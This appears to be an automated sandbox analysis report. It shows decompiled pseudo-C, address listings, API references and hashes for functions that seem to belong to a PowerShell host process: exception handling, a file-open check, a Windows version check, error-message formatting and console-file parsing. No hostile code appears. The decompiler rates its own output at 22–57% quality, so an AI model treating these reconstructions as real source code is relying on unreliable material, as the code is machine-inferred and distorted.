                                                                                                                                                                                                                              0x0125f05a
                                                                                                                                                                                                                              0x0125f05e
                                                                                                                                                                                                                              0x0125f061
                                                                                                                                                                                                                              0x0125f062
                                                                                                                                                                                                                              0x0125f065
                                                                                                                                                                                                                              0x0125f06a
                                                                                                                                                                                                                              0x0125f06f
                                                                                                                                                                                                                              0x0125f06f
                                                                                                                                                                                                                              0x0125f072
                                                                                                                                                                                                                              0x0125f072
                                                                                                                                                                                                                              0x0125f072
                                                                                                                                                                                                                              0x0125f0cc
                                                                                                                                                                                                                              0x0125f0d1
                                                                                                                                                                                                                              0x0125f0d7
                                                                                                                                                                                                                              0x0125f0d8
                                                                                                                                                                                                                              0x0125f0d9
                                                                                                                                                                                                                              0x0125f0dc
                                                                                                                                                                                                                              0x0125f0dd
                                                                                                                                                                                                                              0x0125f0df
                                                                                                                                                                                                                              0x0125f0e0
                                                                                                                                                                                                                              0x0125f0e5
                                                                                                                                                                                                                              0x0125f0e7
                                                                                                                                                                                                                              0x0125f0ec
                                                                                                                                                                                                                              0x0125f0ec
                                                                                                                                                                                                                              0x0125f0ef
                                                                                                                                                                                                                              0x0125f0f2
                                                                                                                                                                                                                              0x0125f0f6
                                                                                                                                                                                                                              0x0125f0f8
                                                                                                                                                                                                                              0x0125f0f8
                                                                                                                                                                                                                              0x0125f0fc
                                                                                                                                                                                                                              0x0125f0fe
                                                                                                                                                                                                                              0x0125f101
                                                                                                                                                                                                                              0x0125f107
                                                                                                                                                                                                                              0x0125f113
                                                                                                                                                                                                                              0x0125f109
                                                                                                                                                                                                                              0x0125f10b
                                                                                                                                                                                                                              0x0125f10e
                                                                                                                                                                                                                              0x0125f10e
                                                                                                                                                                                                                              0x0125f119
                                                                                                                                                                                                                              0x0125f11b
                                                                                                                                                                                                                              0x0125f11b
                                                                                                                                                                                                                              0x0125f12f
                                                                                                                                                                                                                              0x0125f140
                                                                                                                                                                                                                              0x0125f140
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125f0fc
                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0125F025
                                                                                                                                                                                                                              • _CxxThrowException.MSVCRT(00000000,00000000), ref: 0125F0CC
                                                                                                                                                                                                                                • Part of subcall function 0125E223: __EH_prolog3.LIBCMT ref: 0125E22A
                                                                                                                                                                                                                                • Part of subcall function 0125E223: ??0exception@@QAE@XZ.MSVCRT ref: 0125E234
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??0exception@@ExceptionH_prolog3H_prolog3_Throw
                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                              • API String ID: 881692067-1866435925
                                                                                                                                                                                                                              • Opcode ID: a55ce954e5ccc095245db031c206578bf7e164cd3b48134e187223eb3309e7a5
                                                                                                                                                                                                                              • Instruction ID: 41d0b29651729a3fc9a508af979e13b33a4be0ef43cd58eb1a080a57332207e7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a55ce954e5ccc095245db031c206578bf7e164cd3b48134e187223eb3309e7a5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F118671930109EADBD4DB64CAC2FFDB374AB24300F54C049DD05AB085EB705B49CB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125C5FD, Relevance: 7.6, APIs: 5, Instructions: 134fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 54%
                                                                                                                                                                                                                              			E0125C5FD(void* __ebx, WCHAR* __ecx, void* __edi, intOrPtr __esi, void* __eflags) {
				intOrPtr* _t46;
				void* _t50;
				intOrPtr* _t52;
				signed int _t56;
				signed int _t59;
				signed int _t62;
				intOrPtr* _t65;
				long _t68;
				long _t73;
				WCHAR* _t96;
				intOrPtr* _t97;
				void* _t99;
				void* _t100;

				_t98 = __esi;
				_push(0x18);
				E0125A5F0(E0125A897, __ebx, __edi, __esi);
				_t96 = __ecx;
				 *(_t99 - 0x24) = __ecx;
				 *((intOrPtr*)(_t99 - 4)) = 0;
				_t73 = 1;
				 *((intOrPtr*)(_t99 - 0x18)) = 0;
				if( *((intOrPtr*)(_t99 + 8)) != 0 && E01259200(__ecx) == 0) {
					_t50 = CreateFileW(_t96, 1, 1, 0, 3, 0, 0);
					if(_t50 != 0xffffffff) {
						CloseHandle(_t50);
						 *(_t99 - 0x14) =  *(_t99 - 0x14) & 0x00000000;
						 *((char*)(_t99 - 4)) = 1;
						_t52 =  *((intOrPtr*)(_t99 + 8));
						_t98 =  *((intOrPtr*)( *_t52 + 0xf0));
						 *0x1261204(_t52, _t99 - 0x14);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t52 + 0xf0))))() < 0) {
							L13:
							_t73 = 0;
							 *((char*)(_t99 - 4)) = 0;
						} else {
							_t56 =  *(_t99 - 0x14);
							if(_t56 == 0) {
								goto L13;
							} else {
								_t98 =  *((intOrPtr*)( *_t56 + 0x24));
								 *0x1261204(_t56, _t99 - 0x18);
								if( *((intOrPtr*)( *((intOrPtr*)( *_t56 + 0x24))))() < 0 ||  *((intOrPtr*)(_t99 - 0x18)) == 0) {
									goto L13;
								} else {
									_t59 =  *(_t99 - 0x14);
									 *(_t99 - 0x20) =  *(_t99 - 0x20) | 0xffffffff;
									_t98 =  *((intOrPtr*)( *_t59 + 0x2c));
									 *0x1261204(_t59, _t99 - 0x20);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t59 + 0x2c))))() < 0 ||  *(_t99 - 0x20) == 0xffffffff) {
										goto L13;
									} else {
										_t62 =  *(_t99 - 0x14);
										 *(_t99 - 0x1c) =  *(_t99 - 0x1c) | 0xffffffff;
										_t98 =  *((intOrPtr*)( *_t62 + 0x30));
										 *0x1261204(_t62, _t99 - 0x1c);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t62 + 0x30))))() < 0 ||  *(_t99 - 0x1c) == 0xffffffff) {
											goto L13;
										} else {
											_t65 =  *0x12606dc; // 0x3403de0
											_t98 =  *_t65;
											 *0x1261204(_t65, 0, 0x20, _t96,  *((intOrPtr*)(_t99 - 0x18)),  *(_t99 - 0x20),  *(_t99 - 0x1c));
											 *((intOrPtr*)( *_t65 + 4))();
											_t100 = _t100 + 0x1c;
											 *((char*)(_t99 - 4)) = 0;
										}
									}
								}
							}
						}
						E01259691(_t99 - 0x14);
					} else {
						_t68 = GetLastError();
						_t97 =  *0x12606dc; // 0x3403de0
						_t98 =  *((intOrPtr*)( *_t97 + 8));
						 *0x1261204(_t68, 0x1f,  *(_t99 - 0x24));
						 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 8))))();
						_t96 =  *(_t99 - 0x24);
					}
				}
				__imp__#6( *((intOrPtr*)(_t99 - 0x18)));
				if(_t73 == 0) {
					_t46 =  *0x12606dc; // 0x3403de0
					_t98 =  *_t46;
					 *0x1261204(_t46, 0, 0xd, _t96);
					 *((intOrPtr*)( *_t46 + 4))();
				}
				E01259691(_t99 + 8);
				return E0125A59F(_t73, _t96, _t98);
			}
















                                                                                                                                                                                                                              0x0125c5fd
                                                                                                                                                                                                                              0x0125c5fd
                                                                                                                                                                                                                              0x0125c604
                                                                                                                                                                                                                              0x0125c609
                                                                                                                                                                                                                              0x0125c60b
                                                                                                                                                                                                                              0x0125c612
                                                                                                                                                                                                                              0x0125c615
                                                                                                                                                                                                                              0x0125c616
                                                                                                                                                                                                                              0x0125c61c
                                                                                                                                                                                                                              0x0125c638
                                                                                                                                                                                                                              0x0125c641
                                                                                                                                                                                                                              0x0125c66f
                                                                                                                                                                                                                              0x0125c675
                                                                                                                                                                                                                              0x0125c679
                                                                                                                                                                                                                              0x0125c67f
                                                                                                                                                                                                                              0x0125c686
                                                                                                                                                                                                                              0x0125c68e
                                                                                                                                                                                                                              0x0125c698
                                                                                                                                                                                                                              0x0125c73c
                                                                                                                                                                                                                              0x0125c73c
                                                                                                                                                                                                                              0x0125c73e
                                                                                                                                                                                                                              0x0125c69e
                                                                                                                                                                                                                              0x0125c69e
                                                                                                                                                                                                                              0x0125c6a3
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c6a9
                                                                                                                                                                                                                              0x0125c6b0
                                                                                                                                                                                                                              0x0125c6b5
                                                                                                                                                                                                                              0x0125c6bf
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c6c7
                                                                                                                                                                                                                              0x0125c6c7
                                                                                                                                                                                                                              0x0125c6cd
                                                                                                                                                                                                                              0x0125c6d5
                                                                                                                                                                                                                              0x0125c6da
                                                                                                                                                                                                                              0x0125c6e4
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c6ec
                                                                                                                                                                                                                              0x0125c6ec
                                                                                                                                                                                                                              0x0125c6f2
                                                                                                                                                                                                                              0x0125c6fa
                                                                                                                                                                                                                              0x0125c6ff
                                                                                                                                                                                                                              0x0125c709
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c711
                                                                                                                                                                                                                              0x0125c714
                                                                                                                                                                                                                              0x0125c71f
                                                                                                                                                                                                                              0x0125c72a
                                                                                                                                                                                                                              0x0125c730
                                                                                                                                                                                                                              0x0125c733
                                                                                                                                                                                                                              0x0125c736
                                                                                                                                                                                                                              0x0125c736
                                                                                                                                                                                                                              0x0125c709
                                                                                                                                                                                                                              0x0125c6e4
                                                                                                                                                                                                                              0x0125c6bf
                                                                                                                                                                                                                              0x0125c6a3
                                                                                                                                                                                                                              0x0125c744
                                                                                                                                                                                                                              0x0125c643
                                                                                                                                                                                                                              0x0125c643
                                                                                                                                                                                                                              0x0125c649
                                                                                                                                                                                                                              0x0125c657
                                                                                                                                                                                                                              0x0125c65c
                                                                                                                                                                                                                              0x0125c664
                                                                                                                                                                                                                              0x0125c666
                                                                                                                                                                                                                              0x0125c666
                                                                                                                                                                                                                              0x0125c641
                                                                                                                                                                                                                              0x0125c74c
                                                                                                                                                                                                                              0x0125c754
                                                                                                                                                                                                                              0x0125c756
                                                                                                                                                                                                                              0x0125c760
                                                                                                                                                                                                                              0x0125c766
                                                                                                                                                                                                                              0x0125c76c
                                                                                                                                                                                                                              0x0125c76f
                                                                                                                                                                                                                              0x0125c775
                                                                                                                                                                                                                              0x0125c77f

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0125C604
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00000001,00000001,?,00000003,?,?,?,00000018,0125CD86,?,?,?,00000000,00000001), ref: 0125C638
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000001,00000001,?,00000003,?,?,?,00000018,0125CD86,?,?,?,00000000,00000001), ref: 0125C643
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000001,00000001,?,00000003,?,?,?,00000018,0125CD86,?,?,?,00000000,00000001), ref: 0125C66F
                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0125C74C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateErrorFileFreeH_prolog3_HandleLastString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1415290090-0
                                                                                                                                                                                                                              • Opcode ID: 21b385dbda5692ec9cb712df02a49c5c6887165a5df517d07f55004c2d52415f
                                                                                                                                                                                                                              • Instruction ID: f38d782c0c04d886e1a8301aec89a3c96187373e3e0ffbfa28e8bfa7986922cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21b385dbda5692ec9cb712df02a49c5c6887165a5df517d07f55004c2d52415f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6751B270A10246DFDF54DB64D989ABE7B79BF88711F108258EA11A72E4D7306D12CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 012595A0, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 22%
                                                                                                                                                                                                                              			E012595A0(void* __edx) {
				signed int _v8;
				struct _OSVERSIONINFOEXW _v292;
				signed int _t16;
				int _t23;
				void* _t25;
				void* _t29;
				void* _t30;
				void* _t31;
				signed int _t32;

				_t29 = __edx;
				_t16 =  *0x1260358; // 0xc21f7063
				_v8 = _t16 ^ _t32;
				_v292.dwOSVersionInfoSize = 0x11c;
				_v292.dwMajorVersion = 0;
				_v292.dwMinorVersion = 0;
				_v292.dwBuildNumber = 0;
				_v292.dwPlatformId = 0;
				memset( &(_v292.szCSDVersion), 0, 0x100);
				_v292.wServicePackMajor = 0;
				_v292.wServicePackMinor = 0;
				_v292.wProductType = 0;
				__imp__VerSetConditionMask(0, 0, 2, 3, 1, 3, 0x20, 3);
				__imp__VerSetConditionMask(0, _t29);
				__imp__VerSetConditionMask(0, _t29);
				_push(_t29);
				_v292.dwMajorVersion = 6;
				_v292.dwMinorVersion = 1;
				_v292.wServicePackMajor = 0;
				if(VerifyVersionInfoW( &_v292, 0x23, 0) == 0) {
					_t23 = 0;
				} else {
					_t23 = 1;
				}
				return E01259A40(_t23, _t25, _v8 ^ _t32, _t29, _t30, _t31);
			}












                                                                                                                                                                                                                              0x012595a0
                                                                                                                                                                                                                              0x012595ab
                                                                                                                                                                                                                              0x012595b2
                                                                                                                                                                                                                              0x012595c0
                                                                                                                                                                                                                              0x012595cd
                                                                                                                                                                                                                              0x012595d7
                                                                                                                                                                                                                              0x012595e1
                                                                                                                                                                                                                              0x012595eb
                                                                                                                                                                                                                              0x012595f5
                                                                                                                                                                                                                              0x012595ff
                                                                                                                                                                                                                              0x01259603
                                                                                                                                                                                                                              0x01259606
                                                                                                                                                                                                                              0x01259618
                                                                                                                                                                                                                              0x01259620
                                                                                                                                                                                                                              0x01259628
                                                                                                                                                                                                                              0x0125962e
                                                                                                                                                                                                                              0x01259638
                                                                                                                                                                                                                              0x01259644
                                                                                                                                                                                                                              0x0125964f
                                                                                                                                                                                                                              0x0125965b
                                                                                                                                                                                                                              0x0125966f
                                                                                                                                                                                                                              0x0125965d
                                                                                                                                                                                                                              0x0125965d
                                                                                                                                                                                                                              0x0125965d
                                                                                                                                                                                                                              0x0125966c

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 012595F5
                                                                                                                                                                                                                              • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 01259618
                                                                                                                                                                                                                              • VerSetConditionMask.KERNEL32(00000000), ref: 01259620
                                                                                                                                                                                                                              • VerSetConditionMask.KERNEL32(00000000), ref: 01259628
                                                                                                                                                                                                                              • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 01259653
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 375572348-0
                                                                                                                                                                                                                              • Opcode ID: f2fcab8288d3e39d1372d6547fc6c49e800ebb886d1d0934c48672f10279b797
                                                                                                                                                                                                                              • Instruction ID: ca354cbfc448f75b1355c8dad239bfc3fe8c11c16ee5dfb2bbaa57313efdd9e6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2fcab8288d3e39d1372d6547fc6c49e800ebb886d1d0934c48672f10279b797
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8111FB0A5030CAEEF609F60DC4ABEA77B8AF48704F008099EA05E61C1D7B55A548FA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125C4E0, Relevance: 6.1, APIs: 4, Instructions: 79windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                                                                                              			E0125C4E0(intOrPtr* __ecx, long _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				short _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t20;
				intOrPtr* _t31;
				void* _t32;
				signed int _t47;
				void* _t48;
				void* _t49;
				long _t51;
				void* _t52;
				signed int _t54;

				_push(__ecx);
				_push(__ecx);
				_t20 =  *0x1260358; // 0xc21f7063
				_v8 = _t20 ^ _t54;
				_t31 = __ecx;
				_v12 = 0;
				_t51 = FormatMessageW(0x1100, 0, _a4, 0,  &_v12, 0, 0);
				_t57 = _t51;
				if(_t51 == 0) {
					L8:
					_pop(_t52);
					_pop(_t32);
					return E01259A40(_t23, _t32, _v8 ^ _t54, _t46, _t48, _t52);
				}
				_push(_t48);
				_t5 = _t51 + 1; // 0x1
				_t47 = 2;
				_t46 = _t5 * _t47 >> 0x20;
				_t49 = E0125972E( ~(0 | _t57 > 0x00000000) | _t5 * _t47);
				if(_t49 != 0) {
					_t13 = _t51 + 1; // 0x1
					_t46 = _t13;
					if(E0125CE50(_t49, _t13, _v12) < 0) {
						_t51 = 0;
						free(_t49);
						_t49 = 0;
					}
				}
				_t23 = LocalFree(_v12);
				if(_t51 != 0) {
					 *0x1261204(_t31, 0, _a8, _a12, _t49);
					_t23 =  *((intOrPtr*)( *_t31 + 4))();
					if(_t49 != 0) {
						free(_t49);
					}
				}
				_pop(_t48);
				goto L8;
			}


















                                                                                                                                                                                                                              0x0125c4e5
                                                                                                                                                                                                                              0x0125c4e6
                                                                                                                                                                                                                              0x0125c4e7
                                                                                                                                                                                                                              0x0125c4ee
                                                                                                                                                                                                                              0x0125c4f3
                                                                                                                                                                                                                              0x0125c501
                                                                                                                                                                                                                              0x0125c510
                                                                                                                                                                                                                              0x0125c512
                                                                                                                                                                                                                              0x0125c514
                                                                                                                                                                                                                              0x0125c585
                                                                                                                                                                                                                              0x0125c588
                                                                                                                                                                                                                              0x0125c58b
                                                                                                                                                                                                                              0x0125c594
                                                                                                                                                                                                                              0x0125c594
                                                                                                                                                                                                                              0x0125c516
                                                                                                                                                                                                                              0x0125c519
                                                                                                                                                                                                                              0x0125c51e
                                                                                                                                                                                                                              0x0125c51f
                                                                                                                                                                                                                              0x0125c52e
                                                                                                                                                                                                                              0x0125c533
                                                                                                                                                                                                                              0x0125c538
                                                                                                                                                                                                                              0x0125c538
                                                                                                                                                                                                                              0x0125c544
                                                                                                                                                                                                                              0x0125c547
                                                                                                                                                                                                                              0x0125c549
                                                                                                                                                                                                                              0x0125c54f
                                                                                                                                                                                                                              0x0125c54f
                                                                                                                                                                                                                              0x0125c544
                                                                                                                                                                                                                              0x0125c554
                                                                                                                                                                                                                              0x0125c55c
                                                                                                                                                                                                                              0x0125c56d
                                                                                                                                                                                                                              0x0125c573
                                                                                                                                                                                                                              0x0125c57b
                                                                                                                                                                                                                              0x0125c57e
                                                                                                                                                                                                                              0x0125c583
                                                                                                                                                                                                                              0x0125c57b
                                                                                                                                                                                                                              0x0125c584
                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00000000), ref: 0125C50A
                                                                                                                                                                                                                                • Part of subcall function 0125972E: malloc.MSVCRT ref: 01259748
                                                                                                                                                                                                                              • free.MSVCRT(00000000,?), ref: 0125C549
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0125C554
                                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 0125C57E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$FormatFreeLocalMessagemalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 917807956-0
                                                                                                                                                                                                                              • Opcode ID: a9db8739abb4400d3cb25a2937b431f18a0aaa673906d264a4335ee00d62dbb5
                                                                                                                                                                                                                              • Instruction ID: 80f84a31b4f167a93f73d2af9ed5fa54c40586303e4265efd7cfc5e5f3903c33
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9db8739abb4400d3cb25a2937b431f18a0aaa673906d264a4335ee00d62dbb5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D11E77261020ABFDF299F64EC89DBFBB6DDF84614B10421EFD0696190FB71ED109650
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125C8A4, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                                                                                              			E0125C8A4(void* __ebx, intOrPtr __ecx, signed int* __edx, intOrPtr* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t51;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t66;
				intOrPtr* _t70;
				intOrPtr* _t73;
				intOrPtr* _t77;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr _t96;
				intOrPtr* _t103;
				void* _t122;

				_t121 = __esi;
				_t117 = __edi;
				_push(0x28);
				E0125A5F0(E0125A8EC, __ebx, __edi, __esi);
				 *(_t122 - 0x34) = __edx;
				_t84 = __ecx;
				 *((intOrPtr*)(_t122 - 0x28)) = __ecx;
				 *((char*)(_t122 - 0x11)) = 1;
				 *((intOrPtr*)(_t122 - 4)) = 0;
				 *((intOrPtr*)(_t122 - 0x20)) = 0;
				 *((intOrPtr*)(_t122 - 0x18)) = 0;
				 *((intOrPtr*)(_t122 - 0x1c)) = 0;
				 *((char*)(_t122 - 4)) = 3;
				if(E01259200(__ecx) != 0 ||  *((intOrPtr*)(_t122 + 8)) == 0) {
					L31:
					_t85 = 0;
					goto L21;
				} else {
					_t129 = __edx;
					if(__edx == 0) {
						goto L31;
					}
					_push(L"/PSConsoleFile");
					E0125BAF5(_t84, _t122 - 0x2c, __edi, __esi, _t129);
					 *((char*)(_t122 - 4)) = 4;
					_t121 =  *((intOrPtr*)(_t122 - 0x2c));
					if(_t121 == 0) {
						_t96 = 0;
						__eflags = 0;
					} else {
						_t96 =  *_t121;
					}
					_t59 =  *((intOrPtr*)(_t122 + 8));
					 *0x1261204(_t59, _t96, _t122 - 0x20);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t59 + 0x94))))() < 0) {
						L27:
						_push(_t84);
						_push(0x22);
						goto L28;
					} else {
						_t66 =  *((intOrPtr*)(_t122 - 0x20));
						if(_t66 == 0) {
							goto L27;
						}
						_t120 =  *((intOrPtr*)( *_t66 + 0x44));
						 *0x1261204(_t66, _t122 - 0x18);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t66 + 0x44))))() < 0) {
							L26:
							_push(_t84);
							_push(0xf);
							L28:
							_t62 =  *0x12606dc; // 0x3403de0
							_t117 =  *_t62;
							 *0x1261204(_t62, 0);
							 *((intOrPtr*)( *_t62 + 4))();
							_t85 = 0;
							__eflags = 0;
							L29:
							__eflags = _t121;
							if(_t121 != 0) {
								E0125BB5A(_t121);
							}
							L21:
							E01259691(_t122 - 0x1c);
							 *((char*)(_t122 - 4)) = 6;
							_t51 =  *((intOrPtr*)(_t122 - 0x18));
							if(_t51 != 0) {
								_t121 =  *((intOrPtr*)( *_t51 + 8));
								 *0x1261204(_t51);
								 *((intOrPtr*)( *((intOrPtr*)( *_t51 + 8))))();
							}
							E01259691(_t122 - 0x20);
							E01259691(_t122 + 8);
							return E0125A59F(_t85, _t117, _t121);
						}
						_t134 =  *((intOrPtr*)(_t122 - 0x18));
						if( *((intOrPtr*)(_t122 - 0x18)) == 0) {
							goto L26;
						}
						_push(L"ConsoleSchemaVersion");
						E0125BAF5(_t84, _t122 - 0x30, _t120, _t121, _t134);
						 *((char*)(_t122 - 4)) = 5;
						_t117 =  *((intOrPtr*)(_t122 - 0x30));
						if(_t117 == 0) {
							_t103 = 0;
							__eflags = 0;
						} else {
							_t103 =  *_t117;
						}
						_t70 =  *((intOrPtr*)(_t122 - 0x18));
						 *0x1261204(_t70, _t103, _t122 - 0x1c);
						if( *((intOrPtr*)( *_t70 + 0x1c))() < 0) {
							L24:
							_t73 =  *0x12606dc; // 0x3403de0
							 *0x1261204(_t73, 0, 0xf,  *((intOrPtr*)(_t122 - 0x28)));
							 *((intOrPtr*)( *_t73 + 4))();
							_t85 = 0;
							__eflags = _t117;
							if(_t117 != 0) {
								E0125BB5A(_t117);
							}
							goto L29;
						} else {
							_t77 =  *((intOrPtr*)(_t122 - 0x1c));
							if(_t77 == 0) {
								goto L24;
							}
							 *(_t122 - 0x24) =  *(_t122 - 0x24) & 0x00000000;
							 *0x1261204(_t77, _t122 - 0x24);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t77 + 0x68))))() < 0) {
								goto L24;
							}
							 *( *(_t122 - 0x34)) =  *(_t122 - 0x24);
							if(_t117 != 0) {
								E0125BB5A(_t117);
							}
							if(_t121 != 0) {
								E0125BB5A(_t121);
							}
							_t85 =  *((intOrPtr*)(_t122 - 0x11));
							goto L21;
						}
					}
				}
			}















                                                                                                                                                                                                                              0x0125c8a4
                                                                                                                                                                                                                              0x0125c8a4
                                                                                                                                                                                                                              0x0125c8a4
                                                                                                                                                                                                                              0x0125c8ab
                                                                                                                                                                                                                              0x0125c8b0
                                                                                                                                                                                                                              0x0125c8b3
                                                                                                                                                                                                                              0x0125c8b5
                                                                                                                                                                                                                              0x0125c8ba
                                                                                                                                                                                                                              0x0125c8be
                                                                                                                                                                                                                              0x0125c8c1
                                                                                                                                                                                                                              0x0125c8c4
                                                                                                                                                                                                                              0x0125c8c7
                                                                                                                                                                                                                              0x0125c8cb
                                                                                                                                                                                                                              0x0125c8d6
                                                                                                                                                                                                                              0x0125ca82
                                                                                                                                                                                                                              0x0125ca82
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c8e6
                                                                                                                                                                                                                              0x0125c8e6
                                                                                                                                                                                                                              0x0125c8e8
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c8ee
                                                                                                                                                                                                                              0x0125c8f6
                                                                                                                                                                                                                              0x0125c8fb
                                                                                                                                                                                                                              0x0125c8ff
                                                                                                                                                                                                                              0x0125c904
                                                                                                                                                                                                                              0x0125c90a
                                                                                                                                                                                                                              0x0125c90a
                                                                                                                                                                                                                              0x0125c906
                                                                                                                                                                                                                              0x0125c906
                                                                                                                                                                                                                              0x0125c906
                                                                                                                                                                                                                              0x0125c90c
                                                                                                                                                                                                                              0x0125c91f
                                                                                                                                                                                                                              0x0125c929
                                                                                                                                                                                                                              0x0125ca50
                                                                                                                                                                                                                              0x0125ca50
                                                                                                                                                                                                                              0x0125ca51
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c92f
                                                                                                                                                                                                                              0x0125c92f
                                                                                                                                                                                                                              0x0125c934
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c941
